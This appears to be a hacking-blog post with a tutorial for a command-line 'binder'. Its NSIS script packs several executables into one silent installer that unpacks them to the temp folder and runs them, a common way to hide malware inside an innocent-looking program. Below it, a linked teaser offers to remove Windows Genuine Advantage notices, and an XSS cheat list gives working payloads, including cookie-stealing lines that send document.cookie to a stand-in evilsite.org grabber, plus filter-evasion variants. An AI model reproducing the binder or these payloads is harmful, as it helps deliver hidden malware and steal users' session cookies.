First of all, why a command-line binder? Automation. Instead of sitting there binding individual, or even groups of files yourself, you can easily automate the binding process by using a batch file or shell script. Saves time and opens up your options. Here’s how this one works:

1. We’ll be using open-source software called NSIS, which creates Windows installers. You can find it here:

http://nsis.sourceforge.net

. For those of you who use Linux, this is already available in base repositories, so you can just type “apt-get install nsis” or “yum install -y nsis” depending on your package manager.

2. You can use absolute paths to refer to files, but in this example we’ll put notepad.exe and calc.exe in the same directory. Now put the following into a file called bind.nsi:

OutFile "binded.exe"
SilentInstall silent

Section "Install"
File /oname=$TEMP\notepad.exe "notepad.exe"
File /oname=$TEMP\calc.exe "calc.exe"

Exec '"$TEMP\notepad.exe"'
Exec '"$TEMP\calc.exe"'

Sectionend

3. In order to create binded.exe, you need to call “makensis bind.nsi”

4. The above example puts notepad and calc into a file called binded.exe. When you run binded.exe, notepad and calc get extracted to the windows temp directory and are silently run simultaneously. You can bind any number of files quickly, easily, and automatically using this technique.

credit : vdm

Explore More

How to Remove Windows Genuine Advantage Notifications

Windows genuine advantage notifications occur when your computer hasn’t passed the validation test. The validation test can be failed due to being sold a pirated (non-genuine) copy of XP, or

What is BlackIce Defender?

BlackIce Defender is a Host-Based Intrusion Detection System (HIDS). It provides a firewall that detects, reports, and blocks all suspected access attempts. When any intrusion is detected, it provides a

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>